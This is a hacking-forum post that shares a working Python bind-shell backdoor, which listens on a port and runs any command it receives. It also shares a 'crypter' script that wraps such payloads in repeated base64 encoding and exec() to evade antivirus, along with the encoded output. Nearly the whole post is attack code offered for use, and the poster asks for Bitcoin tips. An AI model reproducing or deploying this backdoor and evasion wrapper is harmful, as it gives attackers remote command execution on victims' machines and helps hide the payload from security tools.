Simple Python Base64 Crypter

For the discussion of Perl, Python, Ruby, and PHP and other interpreted languages.

Simple Python Base64 Crypter

Post by Th3_M4d_H4tt3r on Thu Jun 20, 2013 4:39 pm
([msg=76196]see Simple Python Base64 Crypter[/msg])

This crypter can only encrypt python based backdoors.
my test backdoor code:
Code: Select all
import socket
import os
s=socket.socket( )
s.bind(("0.0.0.0", 8080))
s.listen(1)
while 1:
   try:
      c, addr = s.accept()
      while 1:
         c.send("$ ")
         cmd=c.recv(1024)
         if cmd:
            if "exit" in cmd:
               c.send("Bye bye!\n")
               c.close()
               break
            else:
               c.send(os.popen(cmd).read())
   except:
      s.close()
      exit(1)


here is my crypter code:

Code: Select all
'''

pycrypt - by Th3_M4d_H4tt3r

'''

import sys
import base64
import random
import string

file = sys.argv[1]
f = open(file, "r")
encoded=5   # encoded it 5 times.

print "Crypting..."

cryptedfile = open("crypted-"+file, "a")
cryptedfile.write("\nimport base64\n")

a = base64.b64encode(f.read())
for i in range(encoded):
   a = base64.b64encode(a)

crypted = "a = '"+a+"'\n"
cryptedfile.write(crypted)

crypted = "b = base64.b64decode(a)\n"
cryptedfile.write(crypted)
for i in range(encoded):
   crypted = "b = base64.b64decode(b)\n"
   cryptedfile.write(crypted)

crypted = "exec(b)\n"
cryptedfile.write(crypted)
print "Successfuly crypted "+file
print "Saved to: crypted-"+file

the result after crypting gives us this:
Code: Select all
import base64
a = 'VmpGYVlXRnRWa2hWV0d4VVYwaENWVmxYZEV0VE1WVjNWbFJHVG1KSFVsWlZNbkJEWVZaSmVGTnJUbHBOUjJoRVdWWmFhMUpzVG5GVGJIQk9ZV3hhVkZZeWNFdFRiVlp6Vld4YWExSXpRbk5aVjNSYVRXeGtXR05GZEZWTmF6VjZXVEJhYzFac1pFZFhia1pWVmpOQ2Vsa3hXbk5XVms1eldrVTFVMWRHU2taV1ZscHZVVEZLU0ZOdVNrNVdSVnBaVm01d1IyVnNjRWRYYm1SVFVtMDVOVlF4Vm5kaFIwVjNWMWhvVjFKc1drOVVWV1JTWkRKV1NWSnNTbGROYm1oUFZsWlNRMUpyTVVkVmJGcFdZbFJXY2xSVmFGTldWbXhWVVdwQ2FHSldXbFpXYlRWM1YyeGFkR0ZHUWxWV1ZuQXpWakJWTVZORk9WWk9WbHBPWW14S1RsWXlkRk5UTWtsNVZHdG9WR0V5YUZoV2FrcFRWREZhY2xsNlZsVlNhelZYVmtkMFMxbFZNWE5UYTNCV1RXNUNXRlpWV25abFZUbFlUbFpTVjFaVVZrUldNbkJEWXpGS1IxSnVVbXBTVkVaVFZGVldkMlJzV1hsa1IzUldUV3hhVjFsclZsZFViRWw1Vlc1R1lWWnNTbGhaYWtaclZsWk9jazlYYkZOTlJGWkxWbXhhYWs1V1VrZFdiR2hRVm5wV1ZWWnNWVEZSTVdSeFVXNU9VMUpyV25oV1J6RnZWVEF4ZFdGRVdsZE5ibWhRVlZjeFYxSnJPVmhPVjJ4T1lsWktURlpXVWtOU01rcHpWR3hhVldFd2NHaFVWV1EwVWxaV1dFMVlaRlZXTUhCNVZHeG9UMWR0U2xWU2JFNWFZV3RLZWxrd1dsZFhSbkJHWTBkb1YwMHhTazVXVkVaWFZERkdjMkl6WkdsU1ZrcFRWbXBLVTFNeFZsVlJhMlJwWWtkU1ZsVXhhRzloUlRGV1UyeHNWMUp0YUZoWlZ6RkxWakZrZFZKdFJsTk5ibWd4VjJ4V1ZtVkdTbGRVYkZaU1lUTm9WMVp1Y0hOa1ZsVjRWbXM1VW1KSE9UTlphMVpUVld4WmVWVnJkRlpXUlVwTVdrUkdhMlJIU2taVWJXaHBWbGhDV2xac1dsTlpWa3BJVW14YVUySlVWbFZXYkZVeFVURmtjVkZ1VGxOU2ExcFpWMnRXZDFWck1VWlhibFpXVFZaYWNsbDZTa3RXYlVwR1ZXeFNhVmRIYUhwV1YzQkxUVEpSZUZSc2FHbFNWVFZ4VldwQ2QyUXhWbGhOV0dSb1ZteHNORlZzVWt0VmF6RjBaVVZPV0dGclNucFZhMXBIVjBad1JtTkdTazVTVm5BeFZsUkdWMVF4Um5OaU0yUnBVbFpLVTFacVNsTlRNVlp4VVZob1RsWnRkekpWTW5ocllURmFkVkZyVmxoaGEzQjZWbGN4UzJSSFZrbFViRkpYVmpGS1RWWkhlR0ZrTVZwSFUyNVNWV0pYZUc5V2JHUTBUVEZXVlZOdVRsSmlSemt6V1d0V1UxVnNXWGxWYTNSV1ZrVktTRmx0ZUU5V2JGSnlVMjFHVGxJemFFWldWbHByWVRGT2MxTllaRTVXUlZwWlZtdFdkazFHY0VoTlZUVnNWbXh3V1ZReFZqUldiRm8yWWtoV1ZrMVdXbEJWVjNoMlpESktSbFZzU2xkTmJFcE1WbFpTUTFJeVNuTlViRnBWWVRCd2FGUlZaRFJTVmxaWVRWaE9hR0pWY0ZoV01qQTFWMnhrU0ZWcVNsaGhhMHA2Vld0YVIxZEdjRVpqUmtwT1VsWndNVlpVUmxkVU1VWnpZak5rYVZKV1NsTlpiR2h2WTBaVmQxWlVSbXBOVmtZMVYydG9ZVmxWTVVobFJWWldWbTFTY2xVeWVFWmtNVXAwVGxaU1YxWlVWa1JXTW5CRFl6RktSMUpzYUdGU1dFSlRWRlZXZDJWR1drWlpla1pWVFd0d1NWVXlOVk5XYkZvMllraENWVlpGUmpSVVZscHlaREZzTmxadGRFNVhSVXBhVmtkMGFrNVdaSEpOV0VaVFltdHdWVlJXVlhkbFJuQlhWMjVrV0ZKcmNEQmFSVlkwVldzeGRWVnFUbFpXUlhCNlZWZDRkbVF5U2taaFJtUm9Za1Z3YUZaR1pEUlpWVEI0WTBWYVZtSnNjRlZVVldRMFVsWldWMXBIZEZSaVJWWXpWVzB3TVZkck1IbGpNMmhhVm5wR1RGVXdWVFZYVjA1SVVteGFUbUpXU1hwV1ZsSkxZekZHYzJJelpHbFNWa3BUVm1wS1UxTXhWbkZTYkhCT1VtMTRXRmxWV2t0aFZURkZVbXhXV2xaRlNqWlZSa1U1VUZFOVBRPT0='
b = base64.b64decode(a)
b = base64.b64decode(b)
b = base64.b64decode(b)
b = base64.b64decode(b)
b = base64.b64decode(b)
b = base64.b64decode(b)
exec(b)

not super powerful, but will bypass an AV and manipulate the digital signiture.
Tip me if I helped you!
BTC Address: 15wu8gxFAemZH3jC4km3Z8gMYtKHLxpnEv
User avatar
Th3_M4d_H4tt3r
Experienced User
Experienced User
 
Posts: 54
Joined: Tue Jun 18, 2013 8:25 am
Blog: View Blog (0)


Return to Interpreted Languages

Who is online

Users browsing this forum: No registered users and 0 guests